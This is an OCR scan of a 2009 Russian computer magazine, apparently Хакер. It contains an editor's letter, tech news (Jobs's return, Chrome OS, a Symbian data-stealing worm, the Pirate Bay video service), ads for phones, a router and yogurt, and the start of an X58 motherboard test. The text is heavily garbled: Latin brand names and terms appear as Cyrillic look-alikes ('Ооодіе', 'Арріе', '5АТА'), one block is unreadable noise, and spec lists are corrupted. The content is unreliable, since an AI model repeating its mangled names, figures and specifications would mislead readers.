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Гласность и социализация интернета - вот две 
вещи, которые творят чудеса. Ты заметил, как мно- 
го в последнее время стало появляться трешняко- 
вых скандалов, которые именно через обсуждение 
в интернете выходили в федеральные СМИ? 

За последние месяцы - десятки примеров, когда 
обычным чувакам просто с помощью постов вЖЖ, 
сайтов министерств и собственной четкой позиции 
удавалось серьезно повлиять на развитие своей 
сугубо личной проблемы, связанной с недобросо- 
вестным чиновником/серым братом. 
Общественный контроль через интернет и соци- 
альные сети - вотто, что реально меняет сознание 
людям: они видят, что почти на любого чиновника 
можно найти способ давления, даже если и нет в 
родственниках прокурора по области. 

Кчемуя все это пишу? Ктому, что самоуправство и 
нарушения законов со стороны должностных лиц 
бывают и в «нашей» области. Бывает, аргументом 
для судьи является и хранение подкинутого ОБ с 
бредовыми вирусами за 96 год, и дебильная, абсо- 
лютно левая экспертиза, признающая текстовый 
файл вредоносным ПО. Всякое, в общем, бывает. 
Если, не дай Бог, с таким столкнешься - обращайся 
к нам, поможем, по крайней мере советом. 

Р.5. Вчера сделали официальную группу ВКонтак- 
те, куда заджойнилась вся редакция: ѵкопіакіе.ги/ 
сІиЬЮ933209. присоединяйся. Будем там постить и 
анонсировать все наши мероприятия и новости. Ну 
и ты не стесняйся писать свои комменты и пред- 
ложения. Печатаю адрес, т.к. наши фанаты там уже 
сделали 5-6 различных групп и поиском пока найти 
правильную не та к уж просто. 

пікі(022, гл. ред.Х 
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Против лома нет приёма, если нет 
другого лома! Так и каждой попыт- 
ке взлома можно противопоста- 
вить надёжную защиту. 

Легко, просто и интересно гово- 
рить о компьютерах. Но вот когда 
то же самое касается нас самих и 
нашего здоровья, следует быть 
гораздо осторожнее: цена ошиб- 
ки возрастает многократно, ведь 
заменить наше «железо» тяжелее, 
нежели поставить новую материн- 
скую плату вместо сгоревшей. 

Тем не менее, и здесь есть выход: 
враги, противостоящие нашему 
организму, конечно, опасны, но не 
столь изобретательны. На страни- 
цах этого журнала мы разместили 
пять советов Календаря Здоровья. 
Попробуй следовать им - и будь 
уверен, что зесигіТу ІеѵеІ твоего 
организма значительно возрастёт! 
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Джобс возвращается 




Вряд ли для кого-то станет новостью, что исполнительный директор 
Арріе Стивен Джобстяжело болен. Диагноз «рак поджелудочной 
железы» врачи поставили ему еще в 2004 году, так что когда в нача- 
летекущего года Джобс заявил, что временно оставляет компанию 
из-за проблем со здоровьем, многие были не на шутку обеспокоены 
и задавались вопросом, а вернется ли он вообще. Что ж, назло всем 
недоброжелателям Стив возвращается! За пол года отсутствия лидер 
Арріе успел перенести сложную и тяжелую операцию по пересадке 
печени, но сейчас уже достаточно оправился, чтобы вновь приступить к 
работе. Пока Стив вернулся на неполную рабочую неделю, но, учитывая 
прогнозы врачей, которые укладываются в одно емкое слово «ехсеііепі», 
за Джобса уже можно порадоваться и, конечно же, пожелать ему удачи и 
полного выздоровления. 

В ИЮНЕ АУДИТОРИЯ ТѴѴІТТЕК 

ВЫРОСЛА ЕЩЕ НА 14% и 
СОСТАВИЛА ПОРЯДКА 21 МЛН. 
ЧЕЛОВЕК. 



Фармерам придется 
импровизировать 

Знаешь ли ты, что на сегодняшний день китайцев в интернете почти 300 миллионов? 
Возможно, нет, но зато всем хорошо известно, что «восточные братья» фактически 
монополисты по части продаж голды и шмота, а также прокачки чаров почти во всех 
современных ММ06. Судя по всему, в ближайшем будущем фармерам придется 
сбавить обороты, потому как правительство всерьез задумалось о том, что их быстро 
растущий «бизнес» может нехорошо сказаться на экономике страны. Учитывая, какие 
суммы проходят через руки фармеров за год, опасения властей, вероятно, не беспоч- 
венны (будем честны — таким образом можно даже отмывать деньги]. Согласно мне- 
нию правительства, виртуальные деньги должны оставаться в виртуале. Министерство 
культуры и министерство торговли Китая уже выпустили заявление о том, что в скором 
времени на обмен виртуальной валюты на реальные деньги будет наложен запрет. 
Даже игровые таймкарты станет нельзя купить за реальные деньги. Интересно, как 
эта инициатива скажется на балансе и экономике некоторых ММОВРС. Ведь, похоже, 
теперь китайцы смогут использовать голд разве что для рисования аденами :]. 
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ЛОВИ ПОТОК! 



Подъем! Иокіа N97. Последние новости. Посмотрим, что в блогах. Запостить. Комментировать. 
Что в ВКонтакте? Клево, вечером боулинг. Теперь магазин Оѵі - закачать что-то новенькое. 

Уже стучат в аську. Все собираются на пикник. Придумать маршрут. Выслать геотэг. Что завтра? 
Анонс клубных концертов - транслировать. Куча приглашений - ответили. Ого, новый виджет 
закачал! Зайти на Оѵі - ссылка на видеоальбом. Посмотрел. Написал. Ссылка на музыку. 

Качаю. Делюсь. Продолжаю движение... 

ЗАЙДИТЕ НА ѴѴѴѴѴѴ.М0КІА.КІІ/Ы97 



ИОКІА N97. ПЕРВЫЙ МОБИЛЬНЫМ КОМПЬЮТЕР 



□ контакте 



Функции 



Му ыокіа** ѵѵѵѵѵѵ.покіа.ги/тупокіа Бесплатный сервис: поддержка и эксклюзивный контент. 
Реклама. © ІМокіа, 2009. * Среди устройств ІМокіа. ** Моя ІМокіа. 
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Врядли кто-то станет спорить с тем, что моноблоки выглядят 
куда эстетичнее обычных домашних компьютеров. Ну, а если 
кто-то все же возьмется возражать, напомним, что они, ктому 
же, здорово экономят место. Новинка от компании еМасЫпез 
(подразделение Асег] — моноблокеМасЫпез Е21601 -01 — не 
является исключением, но на этот раз стильный дизайн и 
компактность сочетаются с весьма привлекательной ценой: 
всего $400. Впрочем, цена легко объяснима — достаточно 
заглянуть «под капот» девайса, где прячется комплектация 
среднего... нетбука. Процессор Іпіеі Аіот N270 (1.6 ГГц], 
интегрированный графический процессор I пЕеІ Ѳ МА 950, 1 
Гб оперативной памяти (ВОР2-533 МГц], винчестер на 160 
Гб (5АТА), встроенные громкоговорители, плюс оптический 
привод 8х ОѴВіР/ВѴѴ 0І_5ирегМиШ. В комплекттакже входят 
клавиатура и оптическая мышка. В итоге, мы получаем очень 
неплохой неттоп, хотя, конечно, не стоитзабыватьо широ- 
коформатном дисплее диагональю 18.5”. Нетбуки такими 
габаритами похвастаться явно не могут. Стоит отметить: 
благодаря малой мощности машины, разработчикам удалось 
обойтись исключительно пассивным охлаждением. Девайс 
получился оченьтихим. 




ЭКСПЕРТЫ Р05ІТІѴЕ ТЕСНІМ0І.06ІЕ5 
ВЫЯСНИЛИ, ЧТО 74 % ПАРОЛЕЙ 
В КОРПОРАТИВНОМ СЕКТОРЕ НЕ 
СООТВЕТСТВУЮТТРЕБОВАНИЯМ 
СТАНДАРТА РСІ 055. 



ѴГОЕІВАѴ 






ТМѳ ѴИео Вау • Вѳіа Ехігѳте 
(Оопі ехресі апутіпд ю мгагк а( аіі) 



п*п$р<п(оп«(»аіТРѲѵм<Іім«)е<1алОиітв*<а^>*п>Тк(«іок)дг'" ТѴв «ил* Іо те пв»МТІД.5 іиоя 

* *ѵн»*о> ап! <мхко> (л у. мт т* оддѴаоіі ѵіскю агеі ам»о вогтаіі ТЬм я*е мі Ье ап «чиптегм рМудгоигк) ала а 
•исй іиБрОКІ ІО Ьо№ км »пгі йплк («п|ео<кпд *> р*вім (Юпі Ьид и* Юо тисп Л №• КО аті аюкіпд рюр«Ч 



Спаек от В» ѴЮеоѲаѵ паю аі та $иргвлу (опил К» Оеѵе соггтагп «по (мйЬеск 



Новый сервис от ТРВ 



Как ни странно, команда трекера ТЬе 
Рігаіе Вау успевает не только судить- 
ся со всеми, с кем только можно, но и 
развивать свои проекты. Сервис, пред- 
ставляющий собой хостинг для аудио 
и видеоматериалов, о котором ребята 
говорили уже не раз, наконец, запущен 
в виде беты по адресу ЫТрУДЬеѵісІеоЬаѵ. 
от . В целом эта штука обещает быть 
похожа на ѴоиТиЬе, только, конечно же, 
без копирайтов и связанных с ними 



проблем. Примечательно и то, что 
«ВидеоБухта» не использует РІазЬ , вмес- 
то него ставка сделана на НТМІ_ 5 и теги 
<ѵібео> и <аибіо>. Таким образом, многое 
завязано на браузер (например, ІЕ не 
поддерживает те самые теги]. Список 
браузеров, которые точно должны кор- 
ректно работать с ѴібеоВау таков: Еігеіох 
3.5, Орега 9.52 ргеѵіеѵѵ, Соодіе СЬготе 3, 
Забагі 3.4 и Забагі 4. Остальные придется 
проверять. 



И до ЦзепеГа добрались 



СБ 0 ПЙХОГП 



См РВЕЕ Ш 1НШРТШИ 

ѵ игііГі вѵегу эссоипі! 




Коп и расты всего мира придумали отличный способ возвращать «воруемые» у них де- 
ньги — судиться со всеми и вся, а недавняя победа (пусть и неокончательная] право- 
обладателей над многострадальным Рігаіе Ваутолько подлила масла в огонь. Однако 
на этот раз засудили нетрекер, не файлообменники даже не невезучего юзера. Теперь 
очередь, ни много, ни мало, дошла до ІІзепеТ Да-да, той самой сетки, что является 
одной из старейших на нашем шарике (ее придумали еще в 80-м году в Университете 
Дьюк) и состоит из ньюсгрупп. Оказывается, никто не забыл, что в ІІзепеПе можно не 
только общаться, но и публиковать файлы, а значит, там циркулирует внушительное 
количество всяческого контрафакта. Ассоциация ВІАА с удовольствием замахнулась 
бы на всю сеть, но это невозможно из-за ее децентрализованной архитектуры, так 
что еще в 2007 году копирасты подали в суд на сервис ІІзепеТсот Іпс. Тема иска была 
знакома до отвращения — нарушение авторских прав на аудио- и видео-контент. И 
вот совсем недавно стало известно, что суд признал компанию виновной. С мерой 
наказания пока не определились, но ожидать можно чего угодно, начиная от штрафов 
и заканчивая наложением запретов и\или ограничений на «нелегальную деятель- 
ность» ІІзепеЕсот. 



► 006 
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Затзипд Зіаг* 

Действуй. Легко! 



• Сенсорный дисплей 3,0" ѴѴ0Ѵ6А • Пользовательский интерфейс ТоисііѴѴіг 

• Виджеты • 3,2 Мпикс камера • Функция распознавания улыбки • Интернет-браузер 

• Поиск и распознавание музыки • Социальные сети 

Зіаг - звезда 

ТоисНѴѴі2 - интерфейс сенсорного экрана с поддержкой виджетов 

Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. 
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° Ооодіе нужен твой 
телефон 



«Хорошо забытая старая» фишка 
обнаружилось в сервисе 0 Ма і I — 
теперь при регистрации нового 
почтового ящика система может 
потребовать подтверждения 
регистрации посредством 5М5. 

То есть, тебе придется оставить 
Соодіе номер своего мобильника, 
на который система пришлет5М5 
с кодом верификации. Штука не 
нова: когда регистрация в ОМаіІ 
только стала открытой, ее уже 
включали, но довольно быстро 
выключили обратно. Самое 
интересное даже не в этом, а в 
том, что, согласно официальному 
Ьеір’у, Соодіе «запомнит» твой 
телефон на будущее — планиру- 



ется ограничивать количество 
аккаунтов на один мобильный 
номер (каков будет максимум 
ящиков на один мобильник- не 
указано]. Тотже официальный 
беір гласит, что на эту меру 
пришлось пойти ради борьбы со 
спамом и прочей нежелательной 
корреспонденцией. Почему-то 
очень хочется сказать «не верю!». 
Кстати, если возникли проблемы 
с регистрацией (а они, судя по 
всему, могут появиться после 
попыток создать несколько ящи- 
ков подряд, на один и тотже ІР], 
то можно поискать инвайт, тогда 
«светить» номер мобильного 
точно не потребуется. 




тс СООБЩАЕТ, ЧТО В 2008 ГОДУ УРОВЕНЬ ИСПОЛЬЗОВАНИЯ ПИРАТСКОГО ПО 

В РОССИИ снизился до 67%. 

Спрос рождает предложение, так что хороших и разных нет- 
буков на рынке становится все больше. Вот и компания 5опу 
решила порадовать новой линейкой — 10-дюймовыми ѴАЮ 
ѴѴ. Основной отличительной чертой машиноктрадиционно 
для 5опу станетдизайн — цветовых решений ожидаетсятри: 
белый, розовый и коричневый. Последний вариантвыйдет 
очень ограниченным тиражом. «Под капотом» у нетбуков 
все довольно привычно для этого сегмента рынка: ІпІюІАіюпп 
N280 стактовой частотой 1 .66 ГГц, 1 Гб памяти, 160 Гб места 
на жестком диске, веб-камера 3.1 МП, ВІиеІіооѣЬ, ѴѴі-Рі 802. 1 1 
Ь/д/п, І_АЫ и два ІІ5В-порта. Размер дисплея новиноксоста- 
вит 10.1” (соотношение сторон 16:9], разрешение 1366x768 
пикселей. Время работы от аккумуляторов — 3 часа. Цена 
известна пока только для США — $499. До России новинка 
должна добраться уже к августу. 

ПОДАННЫМ МЕББА6ЕІ.АВБ, 
ВИЮНЕДОЛЯСПАМАВ 
МИРОВОМ ПОЧТОВОМ ТРАФИКЕ 
ДОСТИГЛА ОТМЕТКИ 90.4%. 



Божественная 
кухня в Москве 

5-го июня в Москве, в Павильоне Ргобисбоп состоялось мероприятие СосІзкіШЬеп 
СатеШгЬап ѴѴаѵе, организованноеторговой маркой Сатеіи промоутерским агент- 
ством Херреііп Ргобисбоп. Из всех ивентовтакого рода, проводившихся в последнее 
время в России и Москве, этот рейв стал самым крупным, собрав многотысячную 
аудиторию. На протяжении всей ночи за пультом зажигали лучшиетрансовые ди-джеи 
мира: Маркус Шульц, Сандер ван Доорн, Менноде Йонги другие. 




Нетбуки отБопу 




► 008 
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Ооодіе СИготеОЗ 

Дождались и дошутились — 
первыми свою ОС выпустят 
совсем не ІЧего, а Ооодіе. Это 
было предсказуемо, об этом 
говорили и думали давно, но 
теперь все официально, хотя 
информации пока немного. 

По сути, известно следующее: 
ориентироваться ОСь будет 
на рынок нетбуков, и первые 
машинки с Об готе 05 на 
борту можно ожидать уже к 
концу 2010 года. ОСь будет построена на ядре Ыпих, будет работать 
с процессорами х86 и АРМ архитектуры и станетлогичным продол- 
жением одноименного браузера. СЬготе 05 — система с открытым 
кодом, и исходники откроютуже в этом году, радуйся ореп зоигсе 
сообщество! Основной упор делается на легкость и скорость, так 
что в ход пойдут веб-приложения всех мастей, и явно не обойдет- 
ся без облачных вычислений. К платформе АпбгоісІ С б го те 05 
никак не относится, хотя разработчики и планируют, что в будущем 
«сферы влияния» двух систем пересекутся. На этом подробности 
заканчиваются, но новой информации ждать недолго — предста- 
вители Ооодіе обещают рассказать нам больше уже осенью. 

Ітадіпе Сир 2009 

В Каире (Египет) прошел финал одного из самых престижных 
на планете состязаний в сфере высокихтехнологий — Місгозоіі 
Ітадіпе Сир 2009. Это ежегодное соревнование молодыхумов 
проводится с 2003 года при поддержке Місгозоіі и ряда других 
крупных компаний и фондов. И вновь, как и в предыдущие годы, у 
нас есть повод для гордости — на этот раз наша российская коман- 
да из Нижегородского государственного университета им. Н. И. 
Лобачевского Ѵііаі баб взяла «серебро» в самой сложной и, по сути, 
главной категории Ітадіпе сир — ЭоЛѵѵаге Оезідп («Программные 
проекты»). Ребята представляли на суджюри свой проект ѴіѴа, 
призванный помочь человечеству в борьбе с совсем не компьютер- 
ными вирусами: своевременное обнаружение эпидемий на ранних 
стадиях, лоцирование очагов заражения, оповещение людей - вот 
вокруг чего сосредоточена их разработка. Соперничать нижего- 
родцам пришлосьс 69 командами из других стран, ноуступили они 
лишь одной — румынам с проектом 5УТЕСН. Нам остается лишь от 
всей души поздравить ребятс победой и пожелать им дальнейших 
успехов! 





Капитан 
Очевидность 
из Испании 

Настоящим глотком свежего воздуха оказался суд города Барселоны. В 
Испании, как и во всем прогрессивном мире, различные объединения 
авторов и сообщества правообладателей пытаются задушить файло- 
обмен. Только почему-то у местных копирастов все идет совсем нетак 
гладко, каку их коллег. Уже не первый Іаіі постигорганизацию 50АЕ, 
отстаивающую права музыкантов. Устав замахиваться на все «интер- 
неты» сразу, 50АЕ попытались прикрыть крупный сайтеБ2К-ссылок 
еігіпсопс^езиз.сот . Борцы за копирайт надеялись сразу же получить 
предварительное решение суда и остановить деятельность ресурса еще 
до основного разбирательства, но не тут-то было. «Р2Р-сети, как средст- 
во передачи данных между пользователями, не нарушаютникаких прав, 
защищенныхзаконом об интеллектуальной собственности», заявил 
судья Рауль Н. Гарсия Орехудо. Также он напомнил, что презумпцию 
невиновности еще никто не отменял, а копирование или коллективное 
использование материала без извлечения из этого выгоды не являются 
преступлением. И хотя полное слушание состоится позже, а Рауль Н. Гар- 
сия пока что просто озвучил очевидные факты, нельзя не порадоваться 
тому, что такие судьи еще остались. 




Смартфоны 
в опасности 



Специалисты компании ТгепсІ Місго сообщили о новой заразе, поража- 
ющей смартфоны на базе ЭутЬіап 05. Каким образом хакеры сумели 
взломать, или какполучили цифровую подписьот5утбіап Роипсіаііоп, 
неизвестно. Неизвестно и точное количество зараженныхтрубок. Все, 
что пока можно сказать наверняка — червяк, именующийся 5еху 5расе, 
распространяется в виде файла АС55егѵег.ехе, и, попадая в смартфон, 
развиваеттам бурную деятельность. Прога копирует все приватные 
данные юзера, включая его номер и информацию о сети, и отсылает их 
своему хозяину. Крометого, по всем обнаруженным в коммуникаторе 
номерам телефонов червь рассылает 5М 5-сообщения со ссылкой на 
дистрибутив себя самого. 

Рапіа яблоко 

В магазинах России появилась Еапіа с новым вкусом — Рапіа Яблоко 
Азия. Вкус яблока раскрывается в этом напитке в полной мере: перед 
тем, как остановиться именно на этом вкусе, производителю пришлось 
перепробовать более 50 вариантов! 

Новая Рапіа производится и продается вупаковке объемом 0,5л., 1 л. 
и 2 л. и доступна в продаже во всех регионах России. 
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Фишинг? Какой фишинг? 



Ооодіе предложила пользователям СМаіІопробовать новую функцию, 
включить которую можно во вкладке БаЬз — антифишинговый фильтр. 
Пока новый фильтр будет мониторить только сообщения отсервисов 
аукциона еВау и платежной системы РауРа I, что вполне логично — 
это излюбленные«болевыеточки»фишеров. Проверка писем будет 
осуществляться по методу ОКІМ, и прошедшие «тест» мэйлы будут 
помечаться иконкой ключа, а письма, завалившие проверку, недолетят 
даже до папки «Спам» — система удалит их сразу и безвозвратно. Будто 
и не было никаких фишерских мэйлов. В будущем планируется обучить 
фильтр проверять корреспонденцию от других крупных сервисов (в 
основном, конечно, платежных и связанных с финансами, ведьфишеры 
в подавляющем большинстве охотятся именно за деньгами). 

1 5-ГО ИЮЛЯ КОМПАНИЯ МІСК050РТ 
ПОЛНОСТЬЮ ПРЕКРАТИЛА 
ПОДДЕРЖКУ МІСК050РТ ОРРІСЕ 2000, 
ВЫШЕДШЕГО 1 О ЛЕТ НАЗАД. 





Магазины 
МісгозоН — сотіпд 

500П 

Всему миру хорошо знакомы фирменные магазины компании Арріе, дав- 
но ставшие неотъемлемой частью имиджа «Ябблока», и вот в Місгозоіі 
решили, что пора бы обзавестисьаналогичнымиторговымиточками. 
Первый раз об этом было объявлено еще в начале текущего года, но 
новость окончательно подтвердиласьтолько теперь, на прошедшей в 
Нью-Орлеане конференции Місгозоіі: ѴѴогІбѵѵі б е РагІпегСопІегепсе. 
Первые магазины Місгозоіі: откроютсвои двери уже осенью, что явно 
будет приурочено к выходу ѴѴіпсІоѵѵз 7. Любопытно, что расположены 
торговые точки будут возле магазинов Арріе, но подражать «яблочной 
компании» по части дизайна, конечно, никто не собирается. Вместо ко- 
пирования чужих идей Місгозоіі: обещают нечто инновационное и ставят 
перед собой цель не просто продавать свою продукцию, но стать ближе к 
людям, и дать им возможность «пощупать бренд руками». 



Ц5В 3.0 и 5АТА 6 6Ьі(/з 

-О 




Итак, стало известно, кто выпустит первую материнскую плату, оснащенную 
портами 115В 3.0. Конечно, компания А51І5ТеК Сотриіег! Плата Азиз Р6Х58 
Ргетіит впервые была продемонстрирована на выставке Сотриіех 2009, где 
использовалась для демонстрации возможностей 5АТА-600. Да, все верно, 115В 
3.0 является скорее бонусом, чем основной фишкой, ведь новейший интерфейс 
куда интереснее. С такой скоростью (4.8 Гбит/с — 600 М Б/с) пока не работают 
даже самые быстрые 550-накопители :). 115В 3.0 здесь реализован на внешнем 
контроллере ІЧЕС 720200, а не интегрирован в северный мост, но о тормозах 
внешних ІІ5В-накопителей в любом случае можно будет забыть. Помимо 
долгожданных новинок, у Р6Х58 Ргетіит имеются и другие характеристики, о 
которыхтоже забывать не стоит. Плата построена на чипсете Х58, рассчитана 
на процы Соге І7 (сокет 5оскеІ І_(ЗА1 366) и обладает следующими «удобства- 
ми»: 6 БІММ-слотов для трех канальной памяти БОРЗ; 3 слота РСІ Ехргезз 2.0 
х16, 1 слот РСІ Ехргезз хі и 2 слота РСІ; 1 ЮЕ-коннектор и 6 портов 5АТА II; 2 
гигабитных ЕіЬегпеІ-контроллера; на задней панели также присутствуют 7.1 - 
канальное аудио, 2 порта Р5/2, 6 портов 115В 2.0, ЕігеѴѴіге, 5/РОІЕ-выходы и два 
разъема Р Б -45 . О цене и дате поступления «матери» в продажу пока ничего не 
известно. 



► 010 
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Рго есі Ыаіаі 

вѴѴіпсіоѵѵз 

Совсем недавно мы писали о любопытной технологии, продемонстри- 
рованной компанией М іеговой на выставке ЕЗ. Ргоіесі: Ыаіаібыл подан 
публике как инновация для Х-Вох 360, благодаря которой виртуальность 
еще больше приблизится к реальности. С Ыаіаітебе не понадобится 
никаких игровых манипуляторов, достаточно будет просто встать или 
сесть перед экраном телевизора (и стоящей втомже районе камерой] — 
и готово, можно наслаждаться, манипулятором выступает все твое тело. 
Демки технологии действительно впечатлили публику, но неуспел мир 
отойти от первой новости, какза ней последовал комментарий Билла 
Гейтса. Председатель совета директоров МісгозоД заявил, что интер- 
фейс Ыаіаів будущем будет интегрирован и в ѴѴіпсІоѵѵзтоже. Дело втом, 
что разработка пригодна не только для игр, но и для работы с медийным 
контентом (мы, кстати, уже писали о том, что листать список фильмов 
взмахом руки, это довольно круто], в чем Гейтс и видитхорошие перс- 
пективы. Не согласиться сложно — оченьудобно иметь возможность 
управлять компьютером с помощью жестов. 

ИССЛЕДОВАНИЕ КОМПАНИИ 
ІЫТЕКРКЕТ ПОКАЗАЛО, ЧТО 
МУЗЫКАЛЬНЫМ ПИРАТСТВОМ В СЕТИ 
ЗАНИМАЮТСЯ 36% ЮЗЕРОВ. 



Да здравствуют 
универсальные 
зарядки! 



Наверное, почти каждый хоть раз 
вжизни оказывался в ситуации, 
когда под рукой нет за рядного 
устройства для мобильного, те 
зарядки, что имеются в распоря- 
жении, к мобильнику не подходят, а 
взять «родной» адаптер решитель- 
но негде. Неприятно? Что ж, похоже, 
мучениям весьма скоро настанет 
конец. Крупнейшие производители 
мобильныхтелефонов — ІЧокіа, 



5опу Егісззоп, Моіюгоіа, Арріе, ГС, 

N ЕС, Оііаісотт, Незеагсб іп Мобоп, 
Сатзипд и Техаз Іпзігитепіз, нако- 
нец, сумели договориться — к 201 0 
году будет с оз да но ун и версал ьное 
зарядное устройство для всехтипов 
телефонов с разъемом тіего 14513 
(не путатьстіпі 115В]. Учитывая, 
что сейчас вариаций зарядников 
насчитывается более 30 — давно 
пора! 






Беспроводной маршрутизатор 802.1 ІИ 
со встроенным А05І.2+ модемом 



А51І5 05ЫЧ13- 

лёгкая настройка 
и уникальная 
функциональность! 



• ѴѴі-Рі 300 Мбит/с, поддержка 802.11 п и 802. 11 Ь/д 



•/ Адаптирован для России 










• 2 порта 115В 2.0 для совместного 
использования 118В накопителей и принтеров 

• А51І5 АЮізк - личный Интернет - файл - сервер 
без сложных настроек 



Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 



• Утилита для быстрой настройки беспроводной сети 

• Выбор настроек для большинства 
Российских провайдеров 




Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; Коосіоо ТесІіпоІодіез (499) 256-17-31; 0Ю1 (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-32-10; ТКІМТѴ-ЕІ.ЕСТК0ЖСЗ ѵѵш.ігі-еі.ги іпзрігіпд іппоѵаііоп • Регзізіеп* РегТесііоп 





ѴЕНЕ 



Сплойтпак 

для твоего здоровья 

30 часов на отладку ядерного руткита под ѴѴіпсІоѵѵз 7 , чипсы на завтрак, кола на 
обед, вчерашняя пицца на ужин. Знакомая ситуация? Парень, пора завязывать! 
Долго так не протянешь, время налаживать питание. 

приготовленный по аутентичному карельскому 
рецепту. Не содержит молока и обладает целым рядом клинически доказанных 
свойств: 

ѴеІІе повышает иммунитет и помогает твоему организму противостоять 
неблагоприятным условиям окружающей среды 
ѴеІІе нормализует пищеварение и устраняет дисбактериоз 
ѴеІІе защищает печень, выводя из организма токсины и яды 
Благодаря растворимым пищевым волокнам ѴІТАѴЕІЧ®, ѴеІІе благоприятно 
сказывается на работе сердца 




^ Гегшт 



ТЕСТЕР: ВИТАЛИЙ ПРЯХИН 
АВТОР: СЕРГЕЙ НИКИТИН 

Надежная 

платформа 

Сравнительное тестирование сетевых хранилищ 

Бурныйтехнологический прогресс приводит ктому, что на рынке регу- 
лярно появляются новые системные платы. Ксожалению, большинство 
из них (впрочем, каки все новое) страдает различным количеством «де- 
тских болезней», которые впоследствии начинаютлечиться обновле- 
нием ПО. Что-то лечится окончательно, что-то нет... Если ты не хочешь 
участвовать в этом эксперименте, то приобретай надежную испытанную 
платформу, например, системную плату на основе НМС ІпіеІХ58. 



Системные платы, построенные на основе 
Х58, оснащены процессорными разъема- 
ми ЦЗА1366. В связи стем, что процессоры 
семейства Іпіеі ІЧеЬаІет имеют встроенный 
контроллер памяти БОВЗ (трехканальный), в 
самом чипсете он отсутствует. Шина ОРІ имеет 
пропускную способность в 25.6 Гб/с. Южный 
мост ІСН10В поддерживает подключение 
до 6 устройств РСІехІ и до 12 портов ИЗВ. 
Интересной особенностью чипсета является 
официальная поддержка технологии пѴісІіа 5І_І, 
что впервые реализовано в НМС Іпіеі. Помимо 
всего прочего это означает, что в цену каждой 
коробки стакой системной платой включена 
некая сумма, которую пѴісІ іа требует за исполь- 
зование своейтехнологии. Если платить не 
хочется, то можешь приобрести системную пла- 
ту, на которой БЫ заблокирован. В том случае, 
если графических плат несколько, и ты хочешь 
подключить их все, то нужно учесть следующую 
информацию. Северный мостчипсета обеспе- 
чивает работу только 36 линий шиныРСІ-Е2.0, 
следовательно, при включение режима 3-ѵѵау 
БЫ две будут работать в режиме РСІ-Е 8х. Вари- 
антов решения два — либоустановить нетри, 
а два графическихускорителя.так, чтобы на 
каждый приходилось по Іблиний, либо искать 
системную плату, на которой дополнительно 
установлен чип пѴісІіа пРогсе 200, общающий- 
ся ссеверным мостом через Іблиний РСІ-Е. 
Теоретически, скорость работы в этом случае 
должна быть выше, чем у платы без дополни- 
тельного чипа. 



МЕТОДИКА ТЕСТИРОВАНИЯ 

Для исследований мы собрали специальный 
тестовый стенд, который дал возможность 
каждой системной плате проявить свои лучшие 
качества. Это и мощный процессор, и 6 Гб 
оперативной памяти КіпдзТоп, которая удов- 
летворяетспецификациям ЗЕБЕС (напряжение 
1.5, частота 1333 МГц, тайминги 9-9-9-24). Для 
измерения производительности мы использо- 
вали следующее программное обеспечение: 
І_аѵаІу5 Еѵегезі: 5 (тест памяти) и комплексный 
тестовый пакет Раззтагк РеіТотапсеТезіб.І . На 
тестовом стенде была установлена операционная 
система Місгозо^ѴѴіпсІоѵѵзХРБРЗ, передначалом 
исследований ВІ05 системной платы обновлялся 
до последней доступной версии. Помимооценки 
производительности, мы обращали внимание на 
функциональность системной платы, удобство и 



Тестовый стенд: 

Процессор: Іпіеі Соге І7 Ехіхете 965 
Память, Гб: 6, Кіпдзіоп КѴР 1333 03 N9 КЗ/66 
Видеокарта: ОідаЬуІе ОѴ-Ы28-1 ОН-В (чипсет 
ЫѴЮІА ѲТХ280) 

Жесткий диск, ГБ: 192, 550-накопитель 
ТгапзсепсІ Т51920550255-М 

Оптический привод: 5опу ІЧЕС Орбагс АБ- 
72005 

Процессорный кулер: ІЧосіиа ІМН-С12Р 
Блок питания, Вт: 720, Епегтах Іпбпіб 



возможности В 105, а также на состав поставляе- 
мого вместе с платой программного обеспечения 
и различных кабелей, переходников и других 
компонентов. Также мы оценивали соотношение 
цены, качества и возможностей тестируемого 
изделия. 



РЕЗУЛЬТАТ ЗАМЕРА ПРОПУСКНОЙ СПОСОБНОСТИ ПАМЯТИ ПРОГРАММОЙ 

І_АѴАІ_Ѵ5 ЕѴЕРЕ5Т | 


М5І ЕсІірзеБЫ 
Іпіеі 0X5850 
ОідаЬуІе ЕХб8-Ех1гете 
ЕС5Х58В-А 

А51І5 Р6Т6 ѴѴ5 Веѵоіиііоп 
А5ВоскХ58 0е1ихе 

с 


■ Еѵегезі тетогу 
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А5КоскХ58 



Цеіихе 



А5Ц5 Р6Т6 ѴѴ5 

Реѵоіиііоп 12500 руб. 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: северный мост — ІпІеІХ58 Ехргезз, южный мост — Іпіеі ІСН10Р 
ПОДДЕРЖИВАЕМАЯ ПАМЯТЬ: ООРЗ 800/1 066/1 333/1 600/1 866/2000 
МГц поп-ЕСС 
ВІ05: АМІ ВІ05 

СЛОТЫ РАСШИРЕНИЯ: РСІ (3 шт.), РСІ-ЕхІ 6 (4шт.) 

ВНУТРЕННИЕ РАЗЪЕМЫ: 24- и 8-контактный разъемы питания АТХ, 5 
разъемов для питания вентиляторов (из ниходин с поддержкой ШИМ], 
ІЕЕЕ1 394а, 115В 2.0 (3 шт.), ІР, аудио-разъемы для вывода на переднюю 
панель корпуса, СО-іп, СОМ, Н0МІ-5/Р0ІЕ 
ИНТЕРФЕЙСЫ НАКОПИТЕЛЕЙ: 5АТА 2.0 (6 шт.), ЮЕ, Ріорру 
Поддержка РАЮ: 0/1/5/10, Іпіеі Ма1хіх5і:огаде 
РАЗЪЕМЫ НА ЗАДНЕЙ ПАНЕЛИ: Р5/2, 5/РОІЕ (коаксиальный и опти- 
ческий), РЮ45, 1 ЕЕЕ1 394а, 115В 2.0 (6 шт.), е5АТА, МіпЕІаскЗ.5 тт (6 шт.) 
АУДИОКОДЕК: ВеаКек АИС890 
СЕТЕВОЙ АДАПТЕР: РеаКек РТЕ81 1 1 00 

•••••••••О 



ТЕХНИЧЕСКИЕХАРАКТЕРИСТИКИ: 

ЧИПСЕТ: северный мост— ІпІеІХ58 Ехргезз + ІЧѴЮІА пЕогсе 200, южный 
мост— I пЕеІ ІСН10Р 

